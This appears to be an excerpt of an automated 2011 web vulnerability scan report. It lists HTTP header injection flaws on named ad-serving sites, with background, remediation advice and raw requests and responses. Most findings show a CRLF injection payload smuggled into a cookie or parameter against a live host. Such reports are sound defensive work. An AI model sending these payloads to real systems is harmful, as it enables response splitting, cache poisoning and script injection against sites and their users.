Content-Length: 248807
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Sat, 29 Jan 2011 23:50:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript" src="http://static.foxsports.com/cgi-bin/merge?files=/fe/js/spry/xpath.js,/fe/js/spry/SpryData.js,/fe/js/spry/SpryEffects.js,/fe/js/spry/SpryNestedXMLDataSet.js,/fe/js/spry/SpryDOMUtils.js,/fe/js/jQuery/jquery-1.3.min.js,/fe/js/jQuery/plugins/easySlider1.7.js,/fe/js/SWF/
...[SNIP]...

3.11. http://silverlight.codeplex.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://silverlight.codeplex.com
Path:	/

Issue detail

Request

GET /?1'=1 HTTP/1.1
Host: silverlight.codeplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=aa53c1dyzeonloxydyax0t0n; domain=.codeplex.com; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA"
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:39 GMT
Content-Length: 28879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" class="IE IE7 ">

<head id
...[SNIP]...
<div class="MostDownloadedDescription">Html Agility Pack is an agile HTML parser library that proposes a read/write DOM and supports plain XPATH or XSLT. It allows you to parse "out of t...</div>
...[SNIP]...

4. HTTP header injection previous next
There are 16 instances of this issue:

http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [ES cookie]
http://amch.questionmarket.com/adscgen/st.php [code parameter]
http://amch.questionmarket.com/adscgen/st.php [site parameter]
http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ [name of an arbitrarily supplied request parameter]
http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]
http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= [name of an arbitrarily supplied request parameter]
http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]
http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 1]
http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 2]
http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 3]
http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [name of an arbitrarily supplied request parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]
http://redacted/home.asp [name of an arbitrarily supplied request parameter]
http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [ES cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d775684/10/38973908/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 65c2f%0d%0a643c70ed39b was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=65c2f%0d%0a643c70ed39b

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:49:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 14:49:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 06:49:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=65c2f
643c70ed39b_775684-wczsM-0; expires=Thu, 22-Mar-2012 06:49:37 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 1
Content-Type: text/html

;

4.2. http://amch.questionmarket.com/adscgen/st.php [code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload a2e59%0d%0a154c4e3865 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=852149&site=58143061&code=40142779a2e59%0d%0a154c4e3865&randnum=5845715 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:41:00 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 01:40:59 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_852149-1-1; expires=Wed, 21-Mar-2012 17:41:00 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*GtsM-0; expires=Wed, 21-Mar-2012 17:41:00 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=852149&site=4-58143061-&code=40142779a2e59
154c4e3865
Content-Length: 0
Content-Type: text/html

4.3. http://amch.questionmarket.com/adscgen/st.php [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 2d2bc%0d%0aa1ed319a68a was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=852149&site=2d2bc%0d%0aa1ed319a68a&code=40142779&randnum=5845715 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:40:43 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 01:40:42 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_852149-1-1; expires=Wed, 21-Mar-2012 17:40:43 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-qGtsM-0; expires=Wed, 21-Mar-2012 17:40:43 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=852149&site=-1-2d2bc
a1ed319a68a-&code=40142779
Content-Length: 0
Content-Type: text/html

Summary

Severity:	High
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 7a143%0d%0abd80344d819 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/?7a143%0d%0abd80344d819=1 HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:06:20 GMT
X-DirectServer: whitepg_DS1
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: http://www.peoplefinders.com/redirect.aspx?7a143
bd80344d819=1

4.5. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/adclick/CID=0000e376b2c762f700000000/relocate=/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 6cd1b%0d%0a5289c0c2c2e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adclick/CID=0000e376b2c762f700000000/relocate=/?6cd1b%0d%0a5289c0c2c2e=1 HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:06:33 GMT
X-DirectServer: whitepg_DS3
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /?6cd1b
5289c0c2c2e=1

4.6. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/adclick/CID=0000ed08b2c762f700000000/relocate=

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 89d41%0d%0a8fdda0bf760 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adclick/CID=0000ed08b2c762f700000000/relocate=?89d41%0d%0a8fdda0bf760=1 HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 02:09:42 GMT
X-DirectServer: whitepg_DS3
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: ?89d41
8fdda0bf760=1

4.7. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/adclick/CID=0000ed08b2c762f700000000/relocate=/

Response

HTTP/1.1 302 Moved Temporarily
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:40 GMT
X-DirectServer: whitepg_DS0
Content-Length: 0
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
Location: /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link?29f59
7bcc5cf3004=1

4.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 130f0%0d%0a954906be907 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0130f0%0d%0a954906be907; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0130f0
954906be907; expires=Sat, 30-Apr-2011 09: 50:02 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEaciK0c9M00001; expires=Sat, 30-Apr-2011 09:50:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 09:50:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 09:50:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 14:50:01 GMT
Connection: close
Content-Length: 2205

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

4.13. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 3ea58%0d%0a723dce477a3 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=3ea58%0d%0a723dce477a3&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:3ea58
723dce477a3;expires=Sun, 30 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=254
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:30 GMT
Connection: close
Content-Length: 2372

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',3ea58
72
...[SNIP]...

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload c4bae%0d%0aa72d820a2b6 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=c4bae%0d%0aa72d820a2b6&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; 